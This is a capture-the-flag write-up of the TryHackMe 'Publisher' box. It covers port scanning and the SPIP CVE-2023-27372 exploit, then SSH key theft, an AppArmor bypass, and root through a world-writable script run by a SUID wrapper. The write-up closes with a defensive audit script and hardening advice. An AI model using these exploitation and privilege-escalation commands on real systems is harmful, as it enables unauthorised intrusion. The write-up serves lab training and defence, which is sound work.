# [THM] Publisher

## Port scanning

```
nmap -sV -sC -v 10.49.147.252

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e4:10:01:9d:a0:cf:81:bf:2f:de:c7:95:78:b7:a6:1a (RSA)
|   256 35:87:52:45:57:3c:20:91:df:a5:e9:2b:89:70:e1:67 (ECDSA)
|_  256 84:f4:5f:b5:85:09:a8:97:2b:21:4d:20:f1:e9:37:fc (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-title: Publisher's Pulse: SPIP Insights & Tips
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 02:28
Completed NSE at 02:28, 0.00s elapsed
Initiating NSE at 02:28
Completed NSE at 02:28, 0.00s elapsed
Initiating NSE at 02:28
Completed NSE at 02:28, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.40 seconds
           Raw packets sent: 1081 (47.540KB) | Rcvd: 1002 (40.088KB)
```
## Port 80 service enumeration

Directory brute-forcing finds the spip directory.

```
feroxbuster -u http://10.49.147.252 --depth=1 -x php,html,txt,zip,bak,json

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  ` /\  \_/ |  | |__) |__
|    |___ |  \ |  \ | \__, /~~\ / \ \__/ |__/ |___
by Ben "epi" Risher 🤓                 ver: 2.13.1
───────────────────────────┬──────────────────────
 🎯  Target Url            │ http://10.49.147.252/
 🚩  In-Scope Url          │ 10.49.147.252
 🚀  Threads               │ 50
 📖  Wordlist              │ /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 👌  Status Codes          │ All Status Codes!
 💥  Timeout (secs)        │ 7
 🦡  User-Agent            │ feroxbuster/2.13.1
 💉  Config File           │ /etc/feroxbuster/ferox-config.toml
 🔎  Extract Links         │ true
 💲  Extensions            │ [php, html, txt, zip, bak, json]
 🏁  HTTP methods          │ [GET]
 🔃  Recursion Depth       │ 1
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403      GET        9l       28w      278c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      315c http://10.49.147.252/images => http://10.49.147.252/images/
200      GET      354l      770w     5959c http://10.49.147.252/style.css
200      GET       32l      224w    17917c http://10.49.147.252/images/ads.jpg
200      GET      142l      610w    69796c http://10.49.147.252/images/image_02.jpg
200      GET      237l     1368w   110318c http://10.49.147.252/images/image_01.jpg
200      GET      150l      766w     8686c http://10.49.147.252/
200      GET      150l      766w     8686c http://10.49.147.252/index.html
301      GET        9l       28w      313c http://10.49.147.252/spip => http://10.49.147.252/spip/
```
The spip directory is found; a plugin identifies the exact SPIP version, and the version can also be read from the page source.

## Getting a shell with the PoC

```
python CVE-2023-27372.py -u http://10.49.147.252/spip/
[+] The URL http://10.49.147.252/spip/ is vulnerable
[!] Shell is ready, please type your commands
UwU# ls
README.md
SECURITY.md
composer.json
composer.lock
config
ecrire
htaccess.txt
index.php
local
plugins-dist
plugins-dist.json
prive
spip.php
spip.png
spip.svg
squelettes-dist
tmp
vendor
```
## Getting a user shell

The user think is found, and the public and private keys under /home/think are readable.

Save the private key id_rsa locally as id_123, then run `chmod 600 id_123` to set the permissions the private key needs.

Then log in as think with `ssh -i id_123 think@10.48.186.53`.
## Privilege escalation

`find / -perm -u=s -type f 2> /dev/null` shows /usr/sbin/run_container, a SUID binary written by the box's author rather than a stock system program, so it may be vulnerable.

Download it locally and decompile it with IDA; the pseudo-C code shows that it runs /opt/run_container.sh.

The script is world-writable, so we should be able to modify it, yet writing to it fails with a permission-denied error.

```
ls -al /opt/run_container.sh
-rwxrwxrwx 1 root root 1715 Jan 10  2024 /opt/run_container.sh
```
`aa-status` shows that AppArmor is enabled; AppArmor is a mandatory access control system for Linux.

These two blog posts explain how it works.

/etc/passwd shows that our login shell is ash.

AppArmor is path-based: because of the pattern rules in the ash profile, we cannot write files under /opt/, /home/, /bin/, /usr/bin/, /usr/sbin/ or /tmp/, but /dev/shm/ and /var/tmp/ are writable.

We can copy bash into one of those directories to get a normal shell that the AppArmor profile does not cover, which bypasses the restriction.

```
cat /etc/apparmor.d/usr.sbin.ash
# include <tunables/global>

/usr/sbin/ash flags=(complain) {
  # include <abstractions/base>
  # include <abstractions/bash>
  # include <abstractions/consoles>
  # include <abstractions/nameservice>
  # include <abstractions/user-tmp>

  # Remove specific file path rules
  # Deny access to certain directories
  deny /opt/ r,
  deny /opt/** w,
  deny /tmp/** w,
  deny /dev/shm w,
  deny /var/tmp w,
  deny /home/** w,

  /usr/bin/** mrix,
  /usr/sbin/** mrix,

  # Simplified rule for accessing /home directory
  owner /home/** rix,
}
think@ip-10-48-186-53:~$ cp /bin/bash /var/tmp/bash
```
Once we have a normal shell, we can write to /opt/run_container.sh; here we make it set the SUID bit on bash.

```
think@ip-10-48-186-53:~$ echo "chmod +s /bin/bash" > /opt/run_container.sh
think@ip-10-48-186-53:~$ /usr/sbin/run_container
think@ip-10-48-186-53:~$ ls -al /bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18  2022 /bin/bash
```

Then the SUID bash gives us root.

```
10-48-186-53:~$ /bin/bash -p
bash-5.0# ls
spip  user.txt
bash-5.0# id
uid=1000(think) gid=1000(think) euid=0(root) egid=0(root) groups=0(root),1000(think)
```
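The root path above rests on two misconfigurations that a host audit can catch: the world-writable /opt/run_container.sh executed by a root-owned SUID wrapper, and AppArmor deny rules written without a glob (`deny /dev/shm w,` covers only that one path, not files created underneath it, which is why copying bash to /var/tmp works). The following audit script is an added example, not part of the original write-up or of the TryHackMe room; the script path and profile path it takes as arguments are assumptions, and the profile snippet it is tested against is constructed from the rules shown above.

```shell
#!/bin/sh
# Added audit helper (example code, not from the original write-up). It checks for
# the two misconfigurations behind this box's privilege escalation:
#   1. a script executed by a root-owned SUID wrapper is world-writable;
#   2. an AppArmor deny rule names a directory without a glob, so only that
#      path is denied and anything created inside it stays writable.
# Paths passed on the command line are assumptions (e.g. /opt/run_container.sh
# and /etc/apparmor.d/usr.sbin.ash on this box).

# check_world_writable PATH -> exit status 0 if "other" has the write bit
check_world_writable() {
    [ -e "$1" ] || return 1
    # Column 9 of `ls -ld` is the write bit for "other" (-rwxrwxrwx -> w);
    # ls -ld is POSIX, unlike GNU stat -c.
    other_w=$(ls -ld "$1" | cut -c9)
    [ "$other_w" = "w" ]
}

# list_unglobbed_denies PROFILE -> prints "deny <path> <perms>," rules whose
# path has no glob and whose permissions include w. Such a rule blocks writes
# to the directory entry itself, not to files created below it.
list_unglobbed_denies() {
    awk '$1 == "deny" && $2 !~ /\*/ && $3 ~ /w/ { print $1, $2, $3 }' "$1"
}

# harden_unglobbed_denies PROFILE -> the same rules rewritten to cover the
# whole subtree, e.g. "deny /dev/shm w," becomes "deny /dev/shm/** w,"
harden_unglobbed_denies() {
    awk '$1 == "deny" && $2 !~ /\*/ && $3 ~ /w/ {
            sub(/\/$/, "", $2)          # drop a trailing slash before adding the glob
            print "    deny " $2 "/** " $3
         }' "$1"
}

# Stand-alone usage: ./audit.sh /opt/run_container.sh /etc/apparmor.d/usr.sbin.ash
if [ "$#" -eq 2 ]; then
    if check_world_writable "$1"; then
        echo "[!] $1 is world-writable: any local user can change what the SUID wrapper runs"
    else
        echo "[+] $1 is not world-writable"
    fi
    echo "[*] deny rules in $2 that cover only a single path:"
    list_unglobbed_denies "$2"
    echo "[*] suggested replacements:"
    harden_unglobbed_denies "$2"
fi
```

On this box the fix is the combination of both findings: make /opt/run_container.sh writable by root only (`chmod 755`), so the SUID wrapper cannot be pointed at attacker-controlled commands, and replace the single-path denies with `deny /dev/shm/** w,` and `deny /var/tmp/** w,` so the profile actually covers the directories the author intended. Note that the profile is in complain mode, but explicit `deny` rules are still enforced there, which is why the author hit permission errors in the first place.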
## Summary

- Identify the CMS version and find the matching CVE
- Binary analysis
- Bypass AppArmor